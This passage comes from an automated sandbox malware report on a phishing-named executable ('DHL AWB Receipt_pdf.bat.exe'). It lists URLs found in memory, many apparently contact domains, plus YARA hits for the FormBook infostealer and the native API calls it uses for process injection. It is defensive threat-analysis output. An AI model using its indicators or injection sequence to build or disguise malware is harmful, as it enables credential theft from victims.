                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.sencare.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.spacebuilders.net
                Source: CLaoxM16clnn.exe, 00000015.00000002.4209611684.0000000005035000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.spacewalker.app
                Source: CLaoxM16clnn.exe, 00000015.00000002.4209611684.0000000005035000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.spacewalker.app/j7xf/
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.stayplus.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.summergames.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.supercanal.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.swisshemp.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.taffix.net/binding
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.taquzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.taquzhibo.net/binding
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thebossclub.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theflowerpot.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thisit.net
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.urbanscout.net
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wanyuezhibo.net
                Source: CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.workandhealth.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuhaozhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuyezhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xianglizhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaokongzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaoyingzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingyezhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xishizhibo.com
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiuchangzhibo.com
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiulizhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiumozhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiupazhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiyezhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xuetuzhibo.com
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yecaozhibo.com
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yechuizhibo.com
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yewuzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueguangzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yumba.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yundouzhibo.com
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yundouzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yurenzhibo.net
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zeeshop.net
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1853392711.0000000007122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: EhStorAuthn.exe, 00000013.00000003.2185284381.000000000790D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
                Source: EhStorAuthn.exe, 00000013.00000003.2185284381.000000000790D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005AE2000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: EhStorAuthn.exe, 00000013.00000003.2185284381.000000000790D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: EhStorAuthn.exe, 00000013.00000003.2185284381.000000000790D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: EhStorAuthn.exe, 00000013.00000003.2185284381.000000000790D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: EhStorAuthn.exe, 00000013.00000003.2185284381.000000000790D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: EhStorAuthn.exe, 00000013.00000003.2185284381.000000000790D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: EhStorAuthn.exe, 00000013.00000002.4208812041.000000000549A000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.00000000033FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://error.skycloud.tw/system/error?code=400
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
                Source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000297D000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4207261427.0000000002957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000297D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: EhStorAuthn.exe, 00000013.00000002.4207261427.0000000002957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000297D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: EhStorAuthn.exe, 00000013.00000002.4207261427.0000000002957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000297D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: EhStorAuthn.exe, 00000013.00000002.4207261427.0000000002957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: EhStorAuthn.exe, 00000013.00000003.2175842527.00000000078EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://white.anva.org.cn/
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.12377.cn/
                Source: DHL AWB Receipt_pdf.bat.exe, AYBPplggzXaXav.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: EhStorAuthn.exe, 00000013.00000003.2185284381.000000000790D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: EhStorAuthn.exe, 00000013.00000003.2185284381.000000000790D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: EhStorAuthn.exe, 00000013.00000002.4210361745.0000000007660000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000005C74000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208250626.0000000003BD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zzlz.gsxt.gov.cn/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000013.00000002.4206977090.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1997895215.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.4209611684.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4208156839.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1996643989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2004019150.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4207191242.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4208178305.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: DHL AWB Receipt_pdf.bat.exe
                Source: initial sampleStatic PE information: Filename: DHL AWB Receipt_pdf.bat.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0042C763 NtClose,8_2_0042C763
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732B60 NtClose,LdrInitializeThunk,8_2_01732B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01732DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01732C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017335C0 NtCreateMutant,LdrInitializeThunk,8_2_017335C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01734340 NtSetContextThread,8_2_01734340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01734650 NtSuspendThread,8_2_01734650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732BF0 NtAllocateVirtualMemory,8_2_01732BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732BE0 NtQueryValueKey,8_2_01732BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732BA0 NtEnumerateValueKey,8_2_01732BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732B80 NtQueryInformationFile,8_2_01732B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732AF0 NtWriteFile,8_2_01732AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732AD0 NtReadFile,8_2_01732AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732AB0 NtWaitForSingleObject,8_2_01732AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732D30 NtUnmapViewOfSection,8_2_01732D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732D10 NtMapViewOfSection,8_2_01732D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732D00 NtSetInformationFile,8_2_01732D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732DD0 NtDelayExecution,8_2_01732DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732DB0 NtEnumerateKey,8_2_01732DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732C60 NtCreateKey,8_2_01732C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732C00 NtQueryInformationProcess,8_2_01732C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732CF0 NtOpenProcess,8_2_01732CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732CC0 NtQueryVirtualMemory,8_2_01732CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732CA0 NtQueryInformationToken,8_2_01732CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732F60 NtCreateProcessEx,8_2_01732F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732F30 NtCreateSection,8_2_01732F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732FE0 NtCreateFile,8_2_01732FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732FB0 NtResumeThread,8_2_01732FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732FA0 NtQuerySection,8_2_01732FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732F90 NtProtectVirtualMemory,8_2_01732F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732E30 NtWriteVirtualMemory,8_2_01732E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732EE0 NtQueueApcThread,8_2_01732EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732EA0 NtAdjustPrivilegesToken,8_2_01732EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732E80 NtReadVirtualMemory,8_2_01732E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01733010 NtOpenDirectoryObject,8_2_01733010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01733090 NtSetValueKey,8_2_01733090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017339B0 NtGetContextThread,8_2_017339B0
